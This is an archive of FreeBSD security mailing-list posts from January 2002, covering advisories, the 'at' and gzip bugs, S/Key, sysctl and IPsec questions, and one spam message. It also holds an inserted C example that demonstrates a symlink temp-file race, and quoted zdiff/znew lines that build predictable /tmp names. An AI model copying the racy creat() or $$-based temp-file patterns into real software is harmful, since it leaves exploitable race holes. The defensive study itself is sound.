If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > > >Thanks To >========= > >Havard Eidnes and Christos Zoulas for work on the patches, and >Tor Egge of FreeBSD for raising the issue. > > >Revision History >================ > > 2002-01-16 Initial release > > >More Information >================ > >An up-to-date PGP signed copy of this release will be maintained at > >ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-001.txt.asc > >Information about NetBSD and NetBSD security can be found at >http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. > > >Copyright 2002, The NetBSD Foundation, Inc. All Rights Reserved. > >$NetBSD: NetBSD-SA2002-001.txt,v 1.6 2002/01/16 06:28:08 david Exp $ > >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.6 (NetBSD) >Comment: For info see http://www.gnupg.org > >iQCVAwUBPEWdsD5Ru2/4N2IFAQFAlQP8DrpewEgC/72QqEd0WKSHUS6AWh8jaXcf >5Uq3torY6Cuk/C0jlhbbSo+PKdxPbtdmhUDP+7WMcVcGQbNwGI0/sbVj2fS0u5Cq >nm/EQZ8eNf4XudC/CMkpinP2Oid+8K032Mh1b7HiD1UQeE/Nd96X0xEQ4fIRebqt >AGnGymrlWyc= >=vLoR >-----END PGP SIGNATURE----- -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 18:31:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 913FD37B404 for ; Wed, 16 Jan 2002 18:31:15 -0800 (PST) Received: from mailgate4.nec.co.jp ([10.7.69.193]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g0H2V4f12824; Thu, 17 Jan 2002 11:31:04 +0900 (JST) Received: from mailsv.nec.co.jp 
(mailgate51.nec.co.jp [10.7.69.190]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g0H2V3C26295; Thu, 17 Jan 2002 11:31:03 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv.nec.co.jp (8.11.6/3.7W-MAILSV-NEC) with ESMTP id g0H2UxK09941; Thu, 17 Jan 2002 11:31:00 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.2/8.12.2) with ESMTP id g0H2UtcB058418; Thu, 17 Jan 2002 11:30:59 +0900 (JST) Date: Thu, 17 Jan 2002 11:30:55 +0900 (JST) Message-Id: <20020117.113055.130199478.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: at command heap corruption vuln. From: Koga Youichirou X-Mailer: Mew version 3.0.52 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Debian and SuSE announced that "at" command leads into a heap corruption. Does anyone know if this problem affects FreeBSD? Debian: http://www.debian.org/security/2002/dsa-102 SuSE: http://www.linuxsecurity.com/advisories/suse_advisory-1817.html Debian's patch: http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.1.diff.gz Debian's at seems to be same origin with FreeBSD, and free() part in this patch (about check_for_user()) is identical with FreeBSD. -- Koga, Youichirou PS There are other problems, I think creat() and open() in at.c should be exclusive. 
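
[Added example, not part of the original post and not code from at.c: it illustrates the two points raised in this thread, the PS above that creat() and open() should be exclusive and the linker hint to prefer mkstemp() over mktemp()/tmpnam(). The scratch directory, the file names and all helper names are constructed for illustration, and the program only touches a private directory it creates itself.]

```c
/* Added example: exclusive creation of temporary files (POSIX). */
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define VICTIM_TEXT "important data\n"

/* Racy pattern: creat() follows an existing symlink and truncates its target. */
static int create_racy(const char *path) {
    return creat(path, 0600);
}

/* Hardened pattern: with O_EXCL, open() fails with EEXIST if anything,
 * a symlink included, already exists at the path. */
static int create_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

static long size_of(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1L;
}

/* Constructed scenario: a private directory holding a "victim" file and a
 * symlink to it, planted at the guessable name the program will use next. */
static int setup(char *dir, char *victim, char *guess, size_t len) {
    FILE *f;
    strcpy(dir, "/tmp/excl-demo.XXXXXX");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, len, "%s/victim", dir);
    snprintf(guess, len, "%s/job.12345", dir);   /* "name.$$"-style name */
    if ((f = fopen(victim, "w")) == NULL)
        return -1;
    fputs(VICTIM_TEXT, f);
    fclose(f);
    return symlink(victim, guess);
}

static void teardown(const char *dir, const char *victim, const char *guess) {
    unlink(guess);
    unlink(victim);
    rmdir(dir);
}

/* Run one create function against the planted symlink. Returns the victim's
 * size afterwards and stores the create call's errno (0 on success). */
static long attempt(int (*create)(const char *), int *err) {
    char dir[64], victim[128], guess[128];
    long size;
    int fd;
    if (setup(dir, victim, guess, sizeof victim) != 0)
        return -2;
    fd = create(guess);
    *err = fd < 0 ? errno : 0;
    if (fd >= 0)
        close(fd);
    size = size_of(victim);
    teardown(dir, victim, guess);
    return size;
}

/* 1 if the racy create succeeded and emptied the file behind the symlink. */
int racy_create_clobbers_target(void) {
    int err;
    return attempt(create_racy, &err) == 0 && err == 0;
}

/* 1 if the exclusive create was refused with EEXIST and the victim is intact. */
int exclusive_create_refuses(void) {
    int err;
    return attempt(create_exclusive, &err) == (long)strlen(VICTIM_TEXT)
        && err == EEXIST;
}

/* 1 if mkstemp() yields two distinct files from one template, mode 0600. */
int mkstemp_names_are_unique(void) {
    char a[] = "/tmp/excl-demo.XXXXXX", b[] = "/tmp/excl-demo.XXXXXX";
    struct stat st;
    int fa = mkstemp(a), fb = mkstemp(b);
    int ok = fa >= 0 && fb >= 0 && strcmp(a, b) != 0 &&
             fstat(fa, &st) == 0 && (st.st_mode & 0777) == 0600;
    if (fa >= 0) { close(fa); unlink(a); }
    if (fb >= 0) { close(fb); unlink(b); }
    return ok;
}

int main(void) {
    printf("creat() clobbered symlink target: %d\n", racy_create_clobbers_target());
    printf("O_EXCL refused the planted path:  %d\n", exclusive_create_refuses());
    printf("mkstemp() unique and mode 0600:   %d\n", mkstemp_names_are_unique());
    return 0;
}
```

[End of added example. A program that gets EEXIST from the exclusive open should pick a new name and retry, or simply use mkstemp(), which does both steps atomically.]
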
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 0:46:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 89CC437B400 for ; Thu, 17 Jan 2002 00:46:12 -0800 (PST) Received: from mailgate4.nec.co.jp ([10.7.69.193]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g0H8jvf00313; Thu, 17 Jan 2002 17:45:57 +0900 (JST) Received: from mailsv.nec.co.jp (mailgate51.nec.co.jp [10.7.69.196]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g0H8juC12578; Thu, 17 Jan 2002 17:45:56 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv.nec.co.jp (8.11.6/3.7W-MAILSV-NEC) with ESMTP id g0H8jIK03187; Thu, 17 Jan 2002 17:45:54 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.2/8.12.2) with ESMTP id g0H8jIXX011849; Thu, 17 Jan 2002 17:45:18 +0900 (JST) Date: Thu, 17 Jan 2002 17:45:18 +0900 (JST) Message-Id: <20020117.174518.102811786.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: gzip From: Koga Youichirou X-Mailer: Mew version 3.0.52 on Emacs 21.1 / Mule 5.0 (SAKAKI) In-Reply-To: <20011011.160941.74753041.y-koga@jp.FreeBSD.org> Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Debian announced gzip buffer overflow vuln: http://www.debian.org/security/2002/dsa-100 Debian's patch: http://security.debian.org/dists/stable/updates/main/source/gzip_1.2.4-33.1.diff.gz And the official patch has been released: http://www.gzip.org/gzip-1.2.4b.patch I know that FreeBSD's gzip has already fixed this problem in 
1997, however Debian's patch includes other important fixes. I think that FreeBSD's zdiff and znew are also vulnerable.

zdiff:
    F=`echo "$2" | sed 's|.*/||;s|[-.][zZtga]*||'`
    gzip -cdfq "$2" > /tmp/"$F".$$

znew:
    tmp=/tmp/zfoo.$$
    echo hi > $tmp.1
    echo hi > $tmp.2

too horrible ;)

-- Koga, Youichirou

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 0:47:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 287DB37B400 for ; Thu, 17 Jan 2002 00:47:38 -0800 (PST) Received: from mailgate4.nec.co.jp ([10.7.69.197]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g0H8lRf01355; Thu, 17 Jan 2002 17:47:27 +0900 (JST) Received: from mailsv4.nec.co.jp (mailgate51.nec.co.jp [10.7.69.190]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g0H8lLI05537; Thu, 17 Jan 2002 17:47:21 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv4.nec.co.jp (8.11.6/3.7W-MAILSV4-NEC) with ESMTP id g0H8lAG22287; Thu, 17 Jan 2002 17:47:20 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.2/8.12.2) with ESMTP id g0H8lAXX011869; Thu, 17 Jan 2002 17:47:10 +0900 (JST) Date: Thu, 17 Jan 2002 17:47:09 +0900 (JST) Message-Id: <20020117.174709.28435197.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: Re: sdiff tmpfile race condition From: Koga Youichirou In-Reply-To: <20011011.160941.74753041.y-koga@jp.FreeBSD.org> References: <20011011.160941.74753041.y-koga@jp.FreeBSD.org> X-Mailer: Mew version 3.0.52 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List
Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I'm afraid that FreeBSD's sdiff has the same vulnerability described > in following pages: > > http://www.kb.cert.org/vuls/id/579982 typo... http://www.kb.cert.org/vuls/id/579928 > http://www.securityfocus.com/bid/2191 > > Does anyone know current status about this? Regards, -- Koga, Youichirou To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 4:56:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from livroceres.com.br (w186.z064002049.smf-ca.dsl.cnc.net [64.2.49.186]) by hub.freebsd.org (Postfix) with SMTP id 832F837B417; Thu, 17 Jan 2002 04:54:24 -0800 (PST) From: "Livroceres" Subject: Informativo Date: Thu, 17 Jan 2002 10:52:49 -0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000C_01C19F45.1EAD05A0" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 X-MIMEOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Message-Id: <20020117125424.832F837B417@hub.freebsd.org> To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. 
------=_NextPart_000_000C_01C19F45.1EAD05A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

LIVROCERES LTDA
AGRONOMY - VETERINARY MEDICINE - ANIMAL SCIENCE
Phone / Fax: (0xx19) 3433-3733 & 3433-2277
Email: livroceres@livroceres.com.br
HomePage: http://www.livroceres.com.br

Every two weeks we will be sending information about books on technical subjects:

- architecture / landscaping / gardening
- farming
- agriculture
- entomology
- plant pathology
- chemical control of weeds
- silviculture (forests)
- veterinary medicine and animal science

If you do not wish to receive these newsletters, click here so that we can remove your e-mail from our records.

(note: do not click reply, click the indicated link)

Thank you

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
This message is sent in compliance with the new legislation on Electronic Mail, Section 301, Paragraph (a) (3) (c) Decree § 1618, Title Three approved by the 105th Congress Base of International Regulations on SPAM. An e-mail cannot be considered SPAM when it includes a way to be removed. E-MARKETING IS NOT SPAM.

------=_NextPart_000_000C_01C19F45.1EAD05A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
------=_NextPart_000_000C_01C19F45.1EAD05A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 5:50:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 7022637B404 for ; Thu, 17 Jan 2002 05:50:54 -0800 (PST) Received: from randy by rip.psg.com with local (Exim 3.33 #1) id 16RCwQ-0008cn-00 for freebsd-security@freebsd.org; Thu, 17 Jan 2002 05:50:54 -0800 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: s/key! Message-Id: Date: Thu, 17 Jan 2002 05:50:54 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i have never done anything wish s/key on either host. why am i getting this? (both quite recent -stable) ns0.psg.com:/usr/local/src/distfiles# rsy randy@rip.psg.com:bind-9.2.0.tar.gz . otp-md5 3 ri5788 ext S/Key Password: randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 5:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from pcwin002.win.tue.nl (pcwin002.win.tue.nl [131.155.71.72]) by hub.freebsd.org (Postfix) with ESMTP id 858CD37B416 for ; Thu, 17 Jan 2002 05:58:25 -0800 (PST) Received: (from stijn@localhost) by pcwin002.win.tue.nl (8.11.6/8.11.4) id g0HDwIh72120; Thu, 17 Jan 2002 14:58:18 +0100 (CET) (envelope-from stijn) Date: Thu, 17 Jan 2002 14:58:18 +0100 From: Stijn Hoop To: Randy Bush Cc: freebsd-security@freebsd.org Subject: Re: s/key! 
Message-ID: <20020117145818.F76860@pcwin002.win.tue.nl> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="oLBj+sq0vYjzfsbl" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from randy@psg.com on Thu, Jan 17, 2002 at 05:50:54AM -0800 X-Bright-Idea: Let's abolish HTML mail! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --oLBj+sq0vYjzfsbl Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Thu, Jan 17, 2002 at 05:50:54AM -0800, Randy Bush wrote:
> i have never done anything wish s/key on either host. why am i getting
> this? (both quite recent -stable)
>
> ns0.psg.com:/usr/local/src/distfiles# rsy randy@rip.psg.com:bind-9.2.0.tar.gz .
> otp-md5 3 ri5788 ext
> S/Key Password:

This has bitten me before as well. Recent -STABLE turns S/Key on by default in /etc/ssh/sshd_config. Uncomment the line:

# ChallengeResponseAuthentication no

to disable S/Key again.

HTH,

--Stijn

--
"I'm not under the alkafluence of inkahol that some thinkle peep I am. It's just the drunker I sit here the longer I get."
--oLBj+sq0vYjzfsbl Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8Rth6Y3r/tLQmfWcRAm0qAJ0ftUGO/0NvEbX0gm6gBeoetLRHuwCfYMuG ZhmgGlxuZtJ9fr4jCe3LSFk= =/rj7 -----END PGP SIGNATURE----- --oLBj+sq0vYjzfsbl-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 6:12:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 7468437B42F for ; Thu, 17 Jan 2002 06:12:25 -0800 (PST) Received: from randy by rip.psg.com with local (Exim 3.33 #1) id 16RDH7-0009Cm-00; Thu, 17 Jan 2002 06:12:17 -0800 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Stijn Hoop Cc: freebsd-security@freebsd.org Subject: Re: s/key! References: <20020117145818.F76860@pcwin002.win.tue.nl> Message-Id: Date: Thu, 17 Jan 2002 06:12:17 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >> i have never done anything wish s/key on either host. why am i getting >> this? (both quite recent -stable) >> ns0.psg.com:/usr/local/src/distfiles# rsy randy@rip.psg.com:bind-9.2.0.tar.gz . >> otp-md5 3 ri5788 ext >> S/Key Password: > This has bitten me before as well. Recent -STABLE turns S/Key on by > default in /etc/ssh/sshd_config. Uncomment the line: > # ChallengeResponseAuthentication no > to disable S/Key again. bingo! thank you. 
randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 10:16:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from snmail.softnet.ro (snmail.SoftNet.ro [193.231.173.3]) by hub.freebsd.org (Postfix) with ESMTP id 19DB937B402 for ; Thu, 17 Jan 2002 10:16:07 -0800 (PST) Received: from hera ([193.231.173.29]) by snmail.softnet.ro (Lotus Domino Release 5.0.5) with SMTP id 2002011720182175:7752 ; Thu, 17 Jan 2002 20:18:21 +0200 Message-ID: <001e01c19f83$62cf75e0$1dade7c1@hera> From: "Florin MANAILA" To: Subject: Sysctl var. Date: Thu, 17 Jan 2002 20:18:38 +0200 MIME-Version: 1.0 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 Disposition-Notification-To: "Florin MANAILA" X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 X-MIMETrack: Itemize by SMTP Server on server1/softnet(Release 5.0.5 |September 22, 2000) at 01/17/2002 08:18:21 PM, Serialize by Router on server1/softnet(Release 5.0.5 |September 22, 2000) at 01/17/2002 08:18:24 PM, Serialize complete at 01/17/2002 08:18:24 PM Content-Type: multipart/alternative; boundary="----=_NextPart_000_001B_01C19F94.263E5540" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_001B_01C19F94.263E5540 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="iso-8859-1"

Hi all,

For what is this sysctl var. :
net.inet.tcp.blackhole: 0
net.inet.udp.blackhole:0

and

net.inet.tcp.log_in_vain:0
net.inet.udp.log_in_vain:0

????
Best regards, ____________________________________________________________________________ Florin MANAILA ISSO SoftNet Services Calea Floreasca 167 Bucuresti ROMANIA Tel: 04 - 01 - 2331133 Fax: 04 - 01 - 2331177 http://www.softnet.ro ------=_NextPart_000_001B_01C19F94.263E5540 Content-Transfer-Encoding: quoted-printable Content-Type: text/html; charset="iso-8859-1"
------=_NextPart_000_001B_01C19F94.263E5540-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 10:30: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc53.attbi.com (rwcrmhc53.attbi.com [204.127.198.39]) by hub.freebsd.org (Postfix) with ESMTP id 5DA2A37B41A for ; Thu, 17 Jan 2002 10:30:03 -0800 (PST) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc53.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020117183003.UDAK10199.rwcrmhc53.attbi.com@bmah.dyndns.org>; Thu, 17 Jan 2002 18:30:03 +0000 Received: (from bmah@localhost) by bmah.dyndns.org (8.11.6/8.11.6) id g0HIU2633479; Thu, 17 Jan 2002 10:30:02 -0800 (PST) (envelope-from bmah) Message-Id: <200201171830.g0HIU2633479@bmah.dyndns.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: "Florin MANAILA" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sysctl var. In-reply-to: <001e01c19f83$62cf75e0$1dade7c1@hera> References: <001e01c19f83$62cf75e0$1dade7c1@hera> Comments: In-reply-to "Florin MANAILA" message dated "Thu, 17 Jan 2002 20:18:38 +0200." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 17 Jan 2002 10:30:02 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If memory serves me right, "Florin MANAILA" wrote: > For what is this sysctl var. : > net.inet.tcp.blackhole: 0 > net.inet.udp.blackhole:0=20 > > and > > net.inet.tcp.log_in_vain:0 > net.inet.udp.log_in_vain:0 man tcp man udp Bruce. 

From owner-freebsd-security Thu Jan 17 11:48:10 2002
From: "ScaryG"
To: "Florin MANAILA" ,
Date: Thu, 17 Jan 2002 14:49:02 -0500
Subject: Re: Sysctl var.

On 17 Jan 2002 at 20:18, Florin MANAILA wrote:
> For what is this sysctl var. :
> net.inet.tcp.blackhole: 0
> net.inet.udp.blackhole:0

man 4 blackhole

gf

From owner-freebsd-security Thu Jan 17 17:42:26 2002
Date: Thu, 17 Jan 2002 23:49:19 +0200
From: Giorgos Keramidas
To: Florin MANAILA
Cc: freebsd-security@freebsd.org
Subject: Re: Sysctl var.

On 2002-01-17 20:18:38, Florin MANAILA wrote:
> For what is this sysctl var. :
> net.inet.tcp.blackhole: 0
> net.inet.udp.blackhole: 0

The manpages explain what these are about/for: blackhole(4) should
help you with these.

> net.inet.tcp.log_in_vain: 0
> net.inet.udp.log_in_vain: 0

tcp(4) and udp(4) for these :)

--
Giorgos Keramidas . . . . . . . . .  keramida@{ceid.upatras.gr,freebsd.org}
FreeBSD Documentation Project . . .  http://www.freebsd.org/docproj/
FreeBSD: The power to serve . . . .  http://www.freebsd.org/

From owner-freebsd-security Thu Jan 17 21: 5:36 2002
To: security@freebsd.org
Subject: IPSEC into network behind the primary router
Date: Fri, 18 Jan 2002 00:05:31 -0500
From: "James F. Hranicky"

I'd like to be able to set up an IPSEC gateway into my current network
setup without making sweeping changes to the network topology, something
like:

                               ---------- [net 1]-|
                               |                  |
                               |                  |
[internet]------[primary router] -------- [net 2]-|
                        |      |                  |
                        |      |                  |
                        |      ---------- [net 3]-|
                        |                         |
                        |                         |
                  [ipsec tunnel box]--------------

What I'm wondering is if the following is possible:

[ipsec client]
     |                         ---------- [net 1] 1.1.1.0/24
     |                         |
     |                         M
[internet]------[primary router] N------- [net 2] 1.1.2.0/24
                     A    B    O
                     |    |    |
                     |    |    ---------- [net 3] 1.1.3.0/24
                     |    |
                     |    |
                     |    |
                     |    |
                     |    |
                     X    Y
             [ipsec tunnel/nat box]

        A = 1.1.4.1/30        X = 1.1.4.2/30
        B = 1.1.4.5/30        Y = 1.1.4.6/30

The scenario:

  - random ipsec client initiates an ipsec tunnel with the ipsec tunnel
    box attached to my primary router

  - the packet hits interface X and is decrypted. The ipsec server
    decrypts the packet and finds it's destined for [net 1] with a
    source of [ipsec client].

  - interface Y is set up nat, and the routing tables send packets
    destined for [nets 123] out interface Y with a source of Y and
    packets destined for [ipsec client] back out through interface X --
    this way, packets originally from [ipsec client] don't go out
    interfaces [MNO] by mistake.

I suppose if this doesn't work I'm left with transport mode and a gateway
machine, or changing how I currently do routing for my site.

Any help appreciated,

----------------------------------------------------------------------
| Jim Hranicky, Senior SysAdmin                   UF/CISE Department |
| E314D CSE Building                            Phone (352) 392-1499 |
| jfh@cise.ufl.edu                      http://www.cise.ufl.edu/~jfh |
----------------------------------------------------------------------

From owner-freebsd-security Fri Jan 18 4:38:28 2002
From: guy.bruens@philips.com
To: freebsd-security@FreeBSD.ORG
Subject: unsubscribe
Date: Fri, 18 Jan 2002 13:35:05 +0100

unsubscribe

From owner-freebsd-security Fri Jan 18 5:57:10 2002
Date: Fri, 18 Jan 2002 05:56:43 -0800 (PST)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-02:07.k5su
Reply-To: security-advisories@freebsd.org

=============================================================================
FreeBSD-SA-02:07                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          Kerberos 5 su command uses getlogin for authorization

Category:       krb5, ports
Module:         crypto/heimdal/appl/su, heimdal
Announced:      2002-01-18
Credits:        Aaron
Affects:        FreeBSD 4.4-RELEASE
                FreeBSD 4.4-STABLE prior to the correction date
                Ports collection prior to the correction date
Corrected:      2002-01-15 21:52:48 UTC (RELENG_4)
                2002-01-17 15:45:05 UTC (RELENG_4_4)
                2002-10-31 19:58:05 UTC (heimdal port)
FreeBSD only:   NO

I.   Background

The getlogin and setlogin system calls are used to manage the user
name associated with a login session.

k5su is a Kerberos 5-enabled su program.  Like su, it allows
authorized users to `switch user' in order to obtain additional
privileges.

II.  Problem Description

The setlogin system call, the use of which is restricted to the
superuser, is used to associate a user name with a login session.  The
getlogin system call is used to retrieve that user name.  The setlogin
system call is typically used by applications such as login and sshd.

The k5su command included with FreeBSD, versions prior to 4.5-RELEASE,
and the su command included in the heimdal port, versions prior to
heimdal-0.4e_2, use the getlogin system call in order to determine
whether the currently logged-in user is `root'.  In some circumstances,
it is possible for a non-privileged process to have `root' as the login
name returned by getlogin.

The `k5su' command may be installed as part of FreeBSD when Kerberos 5
support is requested, or it may be installed from the FreeBSD Ports
Collection (ports/security/heimdal), in which case it is installed
simply as `su'.

The Heimdal port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 6000 third-party applications in a ready-to-install
format.  The ports collection shipped with FreeBSD 4.4 contains this
problem since it was discovered after the release.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

In some circumstances, processes that have been started by root but
have given up superuser privileges may be able to invoke `k5su' to
regain superuser privileges.

IV.  Workaround

Commands to be executed as root are signified by lines starting with
the `#' character.

[Kerberos 5 in the base system]

Remove the set-user-ID bit from the `k5su' executable by running the
following command as root:

# chmod u-s /usr/bin/k5su

[Heimdal port]

Remove the set-user-ID bit from the `su' executable by running the
following command as root:

# chmod u-s /usr/local/bin/su

V.   Solution

[Kerberos 5 in the base system]

NOTE: If the file /usr/bin/k5su does not exist on your system,
Kerberos 5 is not installed and you do not need to take any action.

Do one of the following:

1) Upgrade your system to 4.4-STABLE or the RELENG_4_4 security
branch, dated after the respective correction dates.

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4-RELEASE
and 4.4-STABLE dated prior to the correction date.  It may or may not
apply to older, unsupported versions of FreeBSD.

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

